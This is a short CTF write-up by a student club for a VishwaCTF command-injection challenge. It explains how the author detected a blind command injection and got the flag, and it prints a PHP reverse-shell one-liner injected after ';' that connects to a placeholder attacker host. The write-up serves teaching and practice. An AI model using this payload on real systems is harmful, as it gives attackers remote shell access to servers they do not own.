Learn some CTF tips and tricks! Presented by the WGCS Club at KLSGIT
In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.
The proper method to solve this challenge was doing a Blind Command Injection.
This is how the website functions
Now lets try to play with it
FISHY!
Now this is a sign of a blind command injection, entering localhosts alone tells you that it is not active. But appending ;ls returns that it is active.
After inspecting the request I intercepted in burp suite I found this: X-Powered-By: PHP/8.1.2–1ubuntu2.11
Which tells two things. 1- The OS is Ubuntu. 2- The website’s backend is PHP. So I went to revshells.com and grabbed this reverse shell payload:
php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");'
A nc listener is on as well as NGROK. The final payload I sent to the web application is this:
localhosts;php -r '$sock=fsockopen("ATTACKER.IP",1337);shell_exec("sh <&3 >&3 2>&3");
To print the flag, we can use the cat command or we can access to the directory (add /flag.txt to the URL).
VishwaCTF{b1inD_cmd-i}